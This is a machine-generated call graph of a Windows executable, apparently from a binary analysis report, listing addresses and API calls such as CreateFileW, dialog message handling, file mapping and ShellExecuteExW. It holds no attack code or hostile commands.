_invalid_parameter_noinfo_noreturn 31 API calls 26070->26072 26074 7ff731c8a3fa 26072->26074 26073 7ff731c899e2 26075 7ff731c82004 98 API calls 26073->26075 26078 7ff731c899eb 26075->26078 26076 7ff731c89ad7 26145 7ff731caa3d0 26076->26145 26078->26070 26080 7ff731c89a26 26078->26080 26084 7ff731ca22a0 _handle_error 8 API calls 26080->26084 26081 7ff731c89a6d 26081->26076 26082 7ff731c88e18 33 API calls 26081->26082 26082->26081 26083 7ff731caa3d0 31 API calls 26096 7ff731c89b17 __vcrt_FlsAlloc 26083->26096 26085 7ff731c8a3ce 26084->26085 26085->25720 26086 7ff731c89c49 26087 7ff731c82a60 99 API calls 26086->26087 26099 7ff731c89d1c 26086->26099 26090 7ff731c89c61 26087->26090 26093 7ff731c82890 102 API calls 26090->26093 26090->26099 26097 7ff731c89c89 26093->26097 26096->26086 26096->26099 26153 7ff731c82b70 26096->26153 26162 7ff731c82890 26096->26162 26167 7ff731c82a60 26096->26167 26097->26099 26119 7ff731c89c97 __vcrt_FlsAlloc 26097->26119 26180 7ff731c90b3c MultiByteToWideChar 26097->26180 26172 7ff731c82004 26099->26172 26100 7ff731c8a1ac 26115 7ff731c8a282 26100->26115 26186 7ff731cacf10 31 API calls 2 library calls 26100->26186 26102 7ff731c8a117 26102->26100 26183 7ff731cacf10 31 API calls 2 library calls 26102->26183 26103 7ff731c8a10b 26103->25720 26106 7ff731c8a362 26109 7ff731caa3d0 31 API calls 26106->26109 26107 7ff731c8a209 26187 7ff731cab73c 31 API calls _invalid_parameter_noinfo_noreturn 26107->26187 26108 7ff731c8a26e 26108->26115 26188 7ff731c88c90 33 API calls 2 library calls 26108->26188 26112 7ff731c8a38b 26109->26112 26110 7ff731c88e18 33 API calls 26110->26115 26113 7ff731caa3d0 31 API calls 26112->26113 26113->26099 26115->26106 26115->26110 26116 7ff731c8a12d 26184 7ff731cab73c 31 API calls _invalid_parameter_noinfo_noreturn 26116->26184 26117 7ff731c8a198 26117->26100 26185 7ff731c88c90 33 API calls 2 library calls 26117->26185 26119->26099 26119->26100 26119->26102 26119->26103 26120 7ff731c8a3e9 26119->26120 26122 7ff731c90ee8 WideCharToMultiByte 26119->26122 26181 7ff731c8aa48 45 API calls _snwprintf 26119->26181 26182 7ff731caa1f0 31 API calls 2 library calls 26119->26182 26189 7ff731ca25a4 8 API calls 26120->26189 26122->26119 26126 7ff731c8a428 26125->26126 26126->25722 26128 7ff731c824bd CreateFileW 26127->26128 26130 7ff731c8256e GetLastError 26128->26130 26139 7ff731c8262e 26128->26139 26131 7ff731c869cc 49 API calls 26130->26131 26132 7ff731c8259c 26131->26132 26133 7ff731c825a0 CreateFileW GetLastError 26132->26133 26140 7ff731c825ec 26132->26140 26133->26140 26134 7ff731c82671 SetFileTime 26138 7ff731c8268f 26134->26138 26135 7ff731c826c8 26136 7ff731ca22a0 _handle_error 8 API calls 26135->26136 26137 7ff731c826db 26136->26137 26137->26073 26137->26081 26138->26135 26141 7ff731c720b0 33 API calls 26138->26141 26139->26134 26139->26138 26140->26139 26142 7ff731c826f6 26140->26142 26141->26135 26143 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 26142->26143 26144 7ff731c826fb 26143->26144 26146 7ff731caa3fd 26145->26146 26152 7ff731caa412 26146->26152 26190 7ff731cad61c 15 API calls abort 26146->26190 26148 7ff731caa407 26191 7ff731ca7864 31 API calls _invalid_parameter_noinfo 26148->26191 26150 7ff731ca22a0 _handle_error 8 API calls 26151 7ff731c89af7 26150->26151 26151->26083 26152->26150 26154 7ff731c82b8d 26153->26154 26155 7ff731c82ba9 26153->26155 26156 7ff731c82bbb 26154->26156 26192 7ff731c7b9d4 97 API calls Concurrency::cancel_current_task 26154->26192 26155->26156 26158 7ff731c82bc1 SetFilePointer 26155->26158 26156->26096 26158->26156 26159 7ff731c82bde GetLastError 26158->26159 26159->26156 26160 7ff731c82be8 26159->26160 26160->26156 26193 7ff731c7b9d4 97 API calls Concurrency::cancel_current_task 26160->26193 26163 7ff731c828b6 26162->26163 26165 7ff731c828bd 26162->26165 26163->26096 26165->26163 26166 7ff731c822e0 GetStdHandle ReadFile GetLastError GetLastError GetFileType 26165->26166 26194 7ff731c7b8b4 97 API calls Concurrency::cancel_current_task 26165->26194 26166->26165 26195 7ff731c82738 26167->26195 26170 7ff731c82a87 26170->26096 26173 7ff731c8201e 26172->26173 26178 7ff731c8202f 26172->26178 26174 7ff731c8202a 26173->26174 26175 7ff731c82031 26173->26175 26173->26178 26203 7ff731c822a0 26174->26203 26207 7ff731c82090 26175->26207 26179->26064 26180->26119 26181->26119 26182->26119 26183->26116 26184->26117 26185->26100 26186->26107 26187->26108 26188->26115 26189->26066 26190->26148 26191->26152 26201 7ff731c82749 _snwprintf 26195->26201 26196 7ff731c82775 26198 7ff731ca22a0 _handle_error 8 API calls 26196->26198 26197 7ff731c82850 SetFilePointer 26197->26196 26200 7ff731c82878 GetLastError 26197->26200 26199 7ff731c827dd 26198->26199 26199->26170 26202 7ff731c7b9d4 97 API calls Concurrency::cancel_current_task 26199->26202 26200->26196 26201->26196 26201->26197 26204 7ff731c822c3 26203->26204 26205 7ff731c822af 26203->26205 26204->26178 26205->26204 26206 7ff731c82090 98 API calls 26205->26206 26206->26204 26208 7ff731c820aa 26207->26208 26209 7ff731c820c2 26207->26209 26208->26209 26211 7ff731c820b6 CloseHandle 26208->26211 26210 7ff731c820e6 26209->26210 26213 7ff731c7b554 97 API calls 26209->26213 26210->26178 26211->26209 26213->26210 26214->25732 26216->25742 26218 7ff731ca0d75 14 API calls _com_raise_error 26269 7ff731c9b110 26612 7ff731c7255c 26269->26612 26271 7ff731c9b15b 26272 7ff731c9b16f 26271->26272 26273 7ff731c9be13 26271->26273 26423 7ff731c9b18c 26271->26423 26276 7ff731c9b17f 26272->26276 26277 7ff731c9b25b 26272->26277 26272->26423 26878 7ff731c9f310 26273->26878 26282 7ff731c9b187 26276->26282 26283 7ff731c9b229 26276->26283 26279 7ff731c9b311 26277->26279 26285 7ff731c9b275 26277->26285 26278 7ff731ca22a0 _handle_error 8 API calls 26284 7ff731c9c2d0 26278->26284 26620 7ff731c722bc GetDlgItem 26279->26620 26280 7ff731c9be3a SendMessageW 26281 7ff731c9be49 26280->26281 26287 7ff731c9be70 GetDlgItem SendMessageW 26281->26287 26288 7ff731c9be55 SendDlgItemMessageW 26281->26288 26293 7ff731c8aaa0 46 API calls 26282->26293 26282->26423 26289 7ff731c9b24b EndDialog 26283->26289 26283->26423 26290 7ff731c8aaa0 46 API calls 26285->26290 26292 7ff731c8629c 35 API calls 26287->26292 26288->26287 26289->26423 26295 7ff731c9b293 SetDlgItemTextW 26290->26295 26297 7ff731c9bec7 GetDlgItem 26292->26297 26294 7ff731c9b1b6 26293->26294 26901 7ff731c71ec4 34 API calls _handle_error 26294->26901 26304 7ff731c9b2a6 26295->26304 26296 7ff731c9b331 EndDialog 26313 7ff731c9b35a 26296->26313 26897 7ff731c72520 26297->26897 26300 7ff731c9b388 GetDlgItem 26302 7ff731c9b3cf SetFocus 26300->26302 26303 7ff731c9b3a2 SendMessageW SendMessageW 26300->26303 26310 7ff731c9b472 26302->26310 26311 7ff731c9b3e5 26302->26311 26303->26302 26309 7ff731c9b2c0 GetMessageW 26304->26309 26304->26423 26307 7ff731c9b1c6 26308 7ff731c9b1dc 26307->26308 26316 7ff731c7250c SetDlgItemTextW 26307->26316 26328 7ff731c9c2e3 26308->26328 26308->26423 26318 7ff731c9b2de IsDialogMessageW 26309->26318 26309->26423 26634 7ff731c78d04 26310->26634 26319 7ff731c8aaa0 46 API calls 26311->26319 26312 7ff731c9b375 26312->26296 26320 7ff731c9bc45 26312->26320 26314 7ff731c71fa0 31 API calls 26313->26314 26314->26423 26316->26308 26318->26304 26323 7ff731c9b2f3 TranslateMessage DispatchMessageW 26318->26323 26324 7ff731c9b3ef 26319->26324 26325 7ff731c8aaa0 46 API calls 26320->26325 26322 7ff731c9b4ac 26644 7ff731c9ef00 26322->26644 26323->26304 26337 7ff731c7129c 33 API calls 26324->26337 26329 7ff731c9bc56 SetDlgItemTextW 26325->26329 26333 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 26328->26333 26332 7ff731c8aaa0 46 API calls 26329->26332 26338 7ff731c9bc88 26332->26338 26339 7ff731c9c2e8 26333->26339 26336 7ff731c8aaa0 46 API calls 26341 7ff731c9b4d5 26336->26341 26342 7ff731c9b418 26337->26342 26350 7ff731c7129c 33 API calls 26338->26350 26344 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 26339->26344 26347 7ff731c8da14 48 API calls 26341->26347 26348 7ff731c9f024 24 API calls 26342->26348 26351 7ff731c9c2ee 26344->26351 26355 7ff731c9b4e8 26347->26355 26356 7ff731c9b425 26348->26356 26383 7ff731c9bcb1 26350->26383 26362 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 26351->26362 26658 7ff731c9f024 26355->26658 26356->26339 26367 7ff731c9b468 26356->26367 26361 7ff731c9bd5a 26368 7ff731c8aaa0 46 API calls 26361->26368 26369 7ff731c9c2f4 26362->26369 26376 7ff731c9b56c 26367->26376 26902 7ff731c9fa00 33 API calls 2 library calls 26367->26902 26378 7ff731c9bd64 26368->26378 26389 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 26369->26389 26373 7ff731c71fa0 31 API calls 26381 7ff731c9b506 26373->26381 26386 7ff731c9b59a 26376->26386 26903 7ff731c83268 26376->26903 26399 7ff731c7129c 33 API calls 26378->26399 26381->26351 26381->26367 26383->26361 26394 7ff731c7129c 33 API calls 26383->26394 26672 7ff731c82f18 26386->26672 26393 7ff731c9c2fa 26389->26393 26404 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 26393->26404 26400 7ff731c9bcff 26394->26400 26397 7ff731c9b5b4 GetLastError 26398 7ff731c9b5cc 26397->26398 26684 7ff731c87f84 26398->26684 26403 7ff731c9bd8d 26399->26403 26406 7ff731c8aaa0 46 API calls 26400->26406 26420 7ff731c7129c 33 API calls 26403->26420 26410 7ff731c9c300 26404->26410 26411 7ff731c9bd0a 26406->26411 26408 7ff731c9b58e 26906 7ff731c99d10 12 API calls _handle_error 26408->26906 26421 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 26410->26421 26416 7ff731c71150 33 API calls 26411->26416 26414 7ff731c9b5de 26418 7ff731c9b5f4 26414->26418 26419 7ff731c9b5e5 GetLastError 26414->26419 26422 7ff731c9bd22 26416->26422 26425 7ff731c9b69c 26418->26425 26429 7ff731c9b6ab 26418->26429 26430 7ff731c9b60b GetTickCount 26418->26430 26419->26418 26426 7ff731c9bdce 26420->26426 26427 7ff731c9c306 26421->26427 26432 7ff731c72034 33 API calls 26422->26432 26423->26278 26425->26429 26447 7ff731c9baf9 26425->26447 26440 7ff731c71fa0 31 API calls 26426->26440 26431 7ff731c7255c 61 API calls 26427->26431 26436 7ff731c9b9d0 26429->26436 26437 7ff731c86414 34 API calls 26429->26437 26687 7ff731c74228 26430->26687 26435 7ff731c9c364 26431->26435 26433 7ff731c9bd3e 26432->26433 26438 7ff731c71fa0 31 API calls 26433->26438 26441 7ff731c9c368 26435->26441 26450 7ff731c9c409 GetDlgItem SetFocus 26435->26450 26477 7ff731c9c37d 26435->26477 26436->26296 26915 7ff731c7bd1c 33 API calls 26436->26915 26444 7ff731c9b6ce 26437->26444 26445 7ff731c9bd4c 26438->26445 26448 7ff731c9bdf8 26440->26448 26458 7ff731ca22a0 _handle_error 8 API calls 26441->26458 26907 7ff731c8b8d0 100 API calls 26444->26907 26453 7ff731c71fa0 31 API calls 26445->26453 26462 7ff731c8aaa0 46 API calls 26447->26462 26456 7ff731c71fa0 31 API calls 26448->26456 26449 7ff731c9b9f5 26916 7ff731c71150 26449->26916 26454 7ff731c9c43a 26450->26454 26453->26361 26467 7ff731c7129c 33 API calls 26454->26467 26455 7ff731c9b63a 26461 7ff731c71fa0 31 API calls 26455->26461 26463 7ff731c9be03 26456->26463 26465 7ff731c9ca17 26458->26465 26460 7ff731c9b6e8 26466 7ff731c8da14 48 API calls 26460->26466 26468 7ff731c9b648 26461->26468 26469 7ff731c9bb27 SetDlgItemTextW 26462->26469 26470 7ff731c71fa0 31 API calls 26463->26470 26464 7ff731c9ba0a 26471 7ff731c8aaa0 46 API calls 26464->26471 26473 7ff731c9b72a GetCommandLineW 26466->26473 26474 7ff731c9c44c 26467->26474 26697 7ff731c820f4 26468->26697 26475 7ff731c72534 26469->26475 26470->26313 26476 7ff731c9ba17 26471->26476 26472 7ff731c9c3b4 SendDlgItemMessageW 26478 7ff731c9c3d4 26472->26478 26479 7ff731c9c3dd EndDialog 26472->26479 26480 7ff731c9b7cf 26473->26480 26481 7ff731c9b7e9 26473->26481 26920 7ff731c88098 33 API calls 26474->26920 26483 7ff731c9bb45 SetDlgItemTextW GetDlgItem 26475->26483 26484 7ff731c71150 33 API calls 26476->26484 26477->26441 26477->26472 26478->26479 26479->26441 26496 7ff731c720b0 33 API calls 26480->26496 26908 7ff731c9aad4 33 API calls _handle_error 26481->26908 26488 7ff731c9bb70 GetWindowLongPtrW SetWindowLongPtrW 26483->26488 26489 7ff731c9bb93 26483->26489 26490 7ff731c9ba2a 26484->26490 26485 7ff731c9c460 26491 7ff731c7250c SetDlgItemTextW 26485->26491 26488->26489 26713 7ff731c9ce08 26489->26713 26495 7ff731c71fa0 31 API calls 26490->26495 26497 7ff731c9c474 26491->26497 26492 7ff731c9b7fa 26909 7ff731c9aad4 33 API calls _handle_error 26492->26909 26502 7ff731c9ba35 26495->26502 26496->26481 26507 7ff731c9c4a6 SendDlgItemMessageW FindFirstFileW 26497->26507 26499 7ff731c9b684 26504 7ff731c82004 98 API calls 26499->26504 26500 7ff731c9b675 GetLastError 26500->26499 26506 7ff731c71fa0 31 API calls 26502->26506 26503 7ff731c9b80b 26910 7ff731c9aad4 33 API calls _handle_error 26503->26910 26509 7ff731c9b691 26504->26509 26505 7ff731c9ce08 158 API calls 26510 7ff731c9bbbc 26505->26510 26511 7ff731c9ba43 26506->26511 26512 7ff731c9c4fb 26507->26512 26604 7ff731c9c984 26507->26604 26514 7ff731c71fa0 31 API calls 26509->26514 26865 7ff731c9f8f4 26510->26865 26521 7ff731c8aaa0 46 API calls 26511->26521 26523 7ff731c8aaa0 46 API calls 26512->26523 26513 7ff731c9b81c 26911 7ff731c8b970 100 API calls 26513->26911 26514->26425 26518 7ff731c9b833 26912 7ff731c9fb5c 33 API calls 26518->26912 26519 7ff731c9ca01 26519->26441 26520 7ff731c9ce08 158 API calls 26534 7ff731c9bbea 26520->26534 26522 7ff731c9ba5b 26521->26522 26535 7ff731c7129c 33 API calls 26522->26535 26527 7ff731c9c51e 26523->26527 26525 7ff731c9ca29 26529 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 26525->26529 26526 7ff731c9bc16 26877 7ff731c72298 GetDlgItem EnableWindow 26526->26877 26539 7ff731c7129c 33 API calls 26527->26539 26528 7ff731c9b852 CreateFileMappingW 26531 7ff731c9b891 MapViewOfFile 26528->26531 26532 7ff731c9b8d3 ShellExecuteExW 26528->26532 26533 7ff731c9ca2e 26529->26533 26913 7ff731ca35c0 26531->26913 26554 7ff731c9b8f4 26532->26554 26537 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 26533->26537 26534->26526 26538 7ff731c9ce08 158 API calls 26534->26538 26545 7ff731c9ba84 26535->26545 26540 7ff731c9ca34 26537->26540 26538->26526 26541 7ff731c9c54d 26539->26541 26543 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 26540->26543 26542 7ff731c71150 33 API calls 26541->26542 26546 7ff731c9c568 26542->26546 26548 7ff731c9ca3a 26543->26548 26544 7ff731c9bada 26549 7ff731c71fa0 31 API calls 26544->26549 26545->26393 26545->26544 26921 7ff731c7e174 33 API calls 2 library calls 26546->26921 26547 7ff731c9b943 26551 7ff731c9b96f 26547->26551 26552 7ff731c9b95c UnmapViewOfFile CloseHandle 26547->26552 26556 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 26548->26556 26549->26296 26551->26369 26555 7ff731c9b9a5 26551->26555 26552->26551 26553 7ff731c9c57f 26557 7ff731c71fa0 31 API calls 26553->26557 26554->26547 26558 7ff731c9b931 Sleep 26554->26558 26560 7ff731c71fa0 31 API calls 26555->26560 26559 7ff731c9ca40 26556->26559 26561 7ff731c9c58c 26557->26561 26558->26547 26558->26554 26564 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 26559->26564 26562 7ff731c9b9c2 26560->26562 26561->26533 26563 7ff731c71fa0 31 API calls 26561->26563 26565 7ff731c71fa0 31 API calls 26562->26565 26566 7ff731c9c5f3 26563->26566 26567 7ff731c9ca46 26564->26567 26565->26436 26568 7ff731c7250c SetDlgItemTextW 26566->26568 26570 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 26567->26570 26569 7ff731c9c607 FindClose 26568->26569 26571 7ff731c9c623 26569->26571 26572 7ff731c9c717 SendDlgItemMessageW 26569->26572 26573 7ff731c9ca4c 26570->26573 26922 7ff731c9a24c 10 API calls _handle_error 26571->26922 26575 7ff731c9c74b 26572->26575 26578 7ff731c8aaa0 46 API calls 26575->26578 26576 7ff731c9c646 26577 7ff731c8aaa0 46 API calls 26576->26577 26579 7ff731c9c64f 26577->26579 26580 7ff731c9c758 26578->26580 26581 7ff731c8da14 48 API calls 26579->26581 26582 7ff731c7129c 33 API calls 26580->26582 26586 7ff731c9c66c BuildCatchObjectHelperInternal 26581->26586 26583 7ff731c9c787 26582->26583 26585 7ff731c71150 33 API calls 26583->26585 26584 7ff731c71fa0 31 API calls 26587 7ff731c9c703 26584->26587 26588 7ff731c9c7a2 26585->26588 26586->26540 26586->26584 26589 7ff731c7250c SetDlgItemTextW 26587->26589 26923 7ff731c7e174 33 API calls 2 library calls 26588->26923 26589->26572 26591 7ff731c9c7b9 26592 7ff731c71fa0 31 API calls 26591->26592 26593 7ff731c9c7c5 BuildCatchObjectHelperInternal 26592->26593 26594 7ff731c71fa0 31 API calls 26593->26594 26595 7ff731c9c7ff 26594->26595 26596 7ff731c71fa0 31 API calls 26595->26596 26597 7ff731c9c80c 26596->26597 26597->26548 26598 7ff731c71fa0 31 API calls 26597->26598 26599 7ff731c9c873 26598->26599 26600 7ff731c7250c SetDlgItemTextW 26599->26600 26601 7ff731c9c887 26600->26601 26601->26604 26924 7ff731c9a24c 10 API calls _handle_error 26601->26924 26603 7ff731c9c8b2 26605 7ff731c8aaa0 46 API calls 26603->26605 26604->26441 26604->26519 26604->26525 26604->26567 26606 7ff731c9c8bc 26605->26606 26607 7ff731c8da14 48 API calls 26606->26607 26609 7ff731c9c8d9 BuildCatchObjectHelperInternal 26607->26609 26608 7ff731c71fa0 31 API calls 26610 7ff731c9c970 26608->26610 26609->26559 26609->26608 26611 7ff731c7250c SetDlgItemTextW 26610->26611 26611->26604 26613 7ff731c7256a 26612->26613 26614 7ff731c725d0 26612->26614 26613->26614 26925 7ff731c8a46c 26613->26925 26614->26271 26616 7ff731c7258f 26616->26614 26617 7ff731c725a4 GetDlgItem 26616->26617 26617->26614 26618 7ff731c725b7 26617->26618 26618->26614 26619 7ff731c725be SetWindowTextW 26618->26619 26619->26614 26621 7ff731c722fc 26620->26621 26622 7ff731c72334 26620->26622 26624 7ff731c7129c 33 API calls 26621->26624 26974 7ff731c723f8 GetWindowTextLengthW 26622->26974 26625 7ff731c7232a BuildCatchObjectHelperInternal 26624->26625 26626 7ff731c72389 26625->26626 26627 7ff731c71fa0 31 API calls 26625->26627 26630 7ff731c723f0 26626->26630 26631 7ff731c723c8 26626->26631 26627->26626 26628 7ff731ca22a0 _handle_error 8 API calls 26629 7ff731c723dd 26628->26629 26629->26296 26629->26300 26629->26312 26632 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 26630->26632 26631->26628 26633 7ff731c723f5 26632->26633 26635 7ff731c78de8 26634->26635 26636 7ff731c78d34 26634->26636 26987 7ff731c72004 33 API calls std::_Xinvalid_argument 26635->26987 26639 7ff731c78d42 BuildCatchObjectHelperInternal 26636->26639 26640 7ff731c78de3 26636->26640 26641 7ff731c78d91 26636->26641 26639->26322 26986 7ff731c71f80 33 API calls 3 library calls 26640->26986 26641->26639 26643 7ff731ca2150 33 API calls 26641->26643 26643->26639 26648 7ff731c9ef30 26644->26648 26645 7ff731c9ef57 26646 7ff731ca22a0 _handle_error 8 API calls 26645->26646 26647 7ff731c9b4b7 26646->26647 26647->26336 26648->26645 26988 7ff731c7bd1c 33 API calls 26648->26988 26650 7ff731c9efaa 26651 7ff731c71150 33 API calls 26650->26651 26652 7ff731c9efbf 26651->26652 26653 7ff731c71fa0 31 API calls 26652->26653 26656 7ff731c9efcf BuildCatchObjectHelperInternal 26652->26656 26653->26656 26654 7ff731c71fa0 31 API calls 26655 7ff731c9eff6 26654->26655 26657 7ff731c71fa0 31 API calls 26655->26657 26656->26654 26657->26645 26989 7ff731c9ad9c PeekMessageW 26658->26989 26661 7ff731c9f0c3 SendMessageW SendMessageW 26663 7ff731c9f124 SendMessageW 26661->26663 26664 7ff731c9f109 26661->26664 26662 7ff731c9f075 26665 7ff731c9f081 ShowWindow SendMessageW SendMessageW 26662->26665 26666 7ff731c9f143 26663->26666 26667 7ff731c9f146 SendMessageW SendMessageW 26663->26667 26664->26663 26665->26661 26666->26667 26668 7ff731c9f173 SendMessageW 26667->26668 26669 7ff731c9f198 SendMessageW 26667->26669 26668->26669 26670 7ff731ca22a0 _handle_error 8 API calls 26669->26670 26671 7ff731c9b4f8 26670->26671 26671->26373 26673 7ff731c8305d 26672->26673 26680 7ff731c82f4e 26672->26680 26674 7ff731ca22a0 _handle_error 8 API calls 26673->26674 26675 7ff731c83073 26674->26675 26675->26397 26675->26398 26676 7ff731c83037 26676->26673 26677 7ff731c83644 56 API calls 26676->26677 26677->26673 26678 7ff731c7129c 33 API calls 26678->26680 26680->26676 26680->26678 26681 7ff731c83088 26680->26681 26994 7ff731c83644 26680->26994 26682 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 26681->26682 26683 7ff731c8308d 26682->26683 26685 7ff731c87f92 SetCurrentDirectoryW 26684->26685 26686 7ff731c87f8f 26684->26686 26685->26414 26686->26685 26688 7ff731c74255 26687->26688 26689 7ff731c7426a 26688->26689 26690 7ff731c7129c 33 API calls 26688->26690 26691 7ff731ca22a0 _handle_error 8 API calls 26689->26691 26690->26689 26692 7ff731c742a1 26691->26692 26693 7ff731c73c84 26692->26693 26694 7ff731c73cab 26693->26694 27028 7ff731c7710c 26694->27028 26696 7ff731c73cbb BuildCatchObjectHelperInternal 26696->26455 26699 7ff731c8212a 26697->26699 26698 7ff731c8215e 26701 7ff731c8223f 26698->26701 26702 7ff731c869cc 49 API calls 26698->26702 26699->26698 26700 7ff731c82171 CreateFileW 26699->26700 26700->26698 26703 7ff731c8226f 26701->26703 26706 7ff731c720b0 33 API calls 26701->26706 26705 7ff731c821c9 26702->26705 26704 7ff731ca22a0 _handle_error 8 API calls 26703->26704 26707 7ff731c82284 26704->26707 26708 7ff731c821cd CreateFileW 26705->26708 26709 7ff731c82206 26705->26709 26706->26703 26707->26499 26707->26500 26708->26709 26709->26701 26710 7ff731c82298 26709->26710 26711 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 26710->26711 26712 7ff731c8229d 26711->26712 27040 7ff731c9a988 26713->27040 26715 7ff731c9d16e 26716 7ff731c71fa0 31 API calls 26715->26716 26717 7ff731c9d177 26716->26717 26719 7ff731ca22a0 _handle_error 8 API calls 26717->26719 26718 7ff731c8d1e8 33 API calls 26835 7ff731c9ce83 BuildCatchObjectHelperInternal 26718->26835 26720 7ff731c9bbab 26719->26720 26720->26505 26721 7ff731c9ee7a 27128 7ff731c7704c 47 API calls BuildCatchObjectHelperInternal 26721->27128 26723 7ff731c78d04 33 API calls 26723->26835 26725 7ff731c9ee80 27129 7ff731c7704c 47 API calls BuildCatchObjectHelperInternal 26725->27129 26727 7ff731c9ee86 26731 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 26727->26731 26729 7ff731c9ee6e 26730 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 26729->26730 26732 7ff731c9ee74 26730->26732 26734 7ff731c9ee8c 26731->26734 27127 7ff731c7704c 47 API calls BuildCatchObjectHelperInternal 26732->27127 26736 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 26734->26736 26738 7ff731c9ee92 26736->26738 26737 7ff731c9edca 26739 7ff731c9ee52 26737->26739 26740 7ff731c720b0 33 API calls 26737->26740 26743 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 26738->26743 27125 7ff731c71f80 33 API calls 3 library calls 26739->27125 26744 7ff731c9edf7 26740->26744 26741 7ff731c9ee68 27126 7ff731c72004 33 API calls std::_Xinvalid_argument 26741->27126 26742 7ff731c713a4 33 API calls 26745 7ff731c9dbba GetTempPathW 26742->26745 26747 7ff731c9ee98 26743->26747 27124 7ff731c9ab68 33 API calls 3 library calls 26744->27124 26745->26835 26746 7ff731c8629c 35 API calls 26746->26835 26756 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 26747->26756 26751 7ff731cabb0c 43 API calls 26751->26835 26753 7ff731c9ee0d 26760 7ff731c71fa0 31 API calls 26753->26760 26763 7ff731c9ee24 BuildCatchObjectHelperInternal 26753->26763 26754 7ff731c72520 SetWindowTextW 26754->26835 26757 7ff731c9ee9e 26756->26757 26764 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 26757->26764 26759 7ff731c9e773 26759->26739 26759->26741 26762 7ff731ca2150 33 API calls 26759->26762 26774 7ff731c9e7bb BuildCatchObjectHelperInternal 26759->26774 26760->26763 26761 7ff731c71fa0 31 API calls 26761->26739 26762->26774 26763->26761 26767 7ff731c9eea4 26764->26767 26765 7ff731c9a988 33 API calls 26765->26835 26773 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 26767->26773 26768 7ff731c9eeec 27132 7ff731c72004 33 API calls std::_Xinvalid_argument 26768->27132 26769 7ff731c720b0 33 API calls 26769->26835 26770 7ff731c71fa0 31 API calls 26770->26737 26771 7ff731c9eef8 27134 7ff731c72004 33 API calls std::_Xinvalid_argument 26771->27134 26772 7ff731c83ef0 54 API calls 26772->26835 26777 7ff731c9eeaa 26773->26777 26783 7ff731c720b0 33 API calls 26774->26783 26824 7ff731c9eb0f 26774->26824 26789 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 26777->26789 26778 7ff731c9eef2 27133 7ff731c71f80 33 API calls 3 library calls 26778->27133 26779 7ff731c720b0 33 API calls 26860 7ff731c9d409 26779->26860 26781 7ff731c857e0 33 API calls 26781->26835 26782 7ff731c9eee6 27131 7ff731c71f80 33 API calls 3 library calls 26782->27131 26790 7ff731c9e8e3 26783->26790 26786 7ff731c9ecc0 26786->26771 26786->26778 26803 7ff731c9ecbb BuildCatchObjectHelperInternal 26786->26803 26807 7ff731ca2150 33 API calls 26786->26807 26788 7ff731c9ebaa 26788->26768 26788->26782 26797 7ff731c9ebf2 BuildCatchObjectHelperInternal 26788->26797 26799 7ff731ca2150 33 API calls 26788->26799 26788->26803 26796 7ff731c9eeb0 26789->26796 26798 7ff731c9eee0 26790->26798 26804 7ff731c7129c 33 API calls 26790->26804 26793 7ff731c9d569 GetDlgItem 26800 7ff731c72520 SetWindowTextW 26793->26800 26795 7ff731c83cf4 51 API calls 26795->26835 26808 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 26796->26808 27045 7ff731c9f460 26797->27045 27130 7ff731c7704c 47 API calls BuildCatchObjectHelperInternal 26798->27130 26799->26797 26805 7ff731c9d588 SendMessageW 26800->26805 26803->26770 26809 7ff731c9e926 26804->26809 26805->26860 26806 7ff731c8dba8 33 API calls 26806->26835 26807->26803 26814 7ff731c9eeb6 26808->26814 27120 7ff731c8d1e8 26809->27120 26811 7ff731c85b20 53 API calls 26811->26835 26812 7ff731c72674 31 API calls 26812->26835 26815 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 26814->26815 26817 7ff731c9eebc 26815->26817 26816 7ff731c9d5bc SendMessageW 26816->26860 26821 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 26817->26821 26825 7ff731c9eec2 26821->26825 26823 7ff731c7129c 33 API calls 26832 7ff731c9e951 26823->26832 26824->26786 26824->26788 26826 7ff731c9eeda 26824->26826 26846 7ff731c9eed4 26824->26846 26831 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 26825->26831 26829 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 26826->26829 26827 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 26827->26826 26828 7ff731c71744 33 API calls 26828->26835 26829->26798 26830 7ff731c74228 33 API calls 26830->26835 26834 7ff731c9eec8 26831->26834 26832->26823 26832->26824 26832->26834 26840 7ff731c9eece 26832->26840 26849 7ff731c71fa0 31 API calls 26832->26849 26854 7ff731c91344 CompareStringW 26832->26854 26858 7ff731c8d1e8 33 API calls 26832->26858 26833 7ff731c83268 51 API calls 26833->26835 26836 7ff731ca7884 _invalid_parameter_noinfo_noreturn 31 API calls 26834->26836 26835->26715 26835->26718 26835->26721 26835->26723 26835->26725 26835->26729 26835->26732 26835->26734 26835->26737 26835->26738 26835->26742 26835->26746 26835->26747 26835->26751 26835->26754 26835->26757 26835->26759 26835->26765 26835->26767 26835->26769 26835->26772 26835->26777 26835->26781 26835->26795 26835->26796 26835->26806 26835->26811 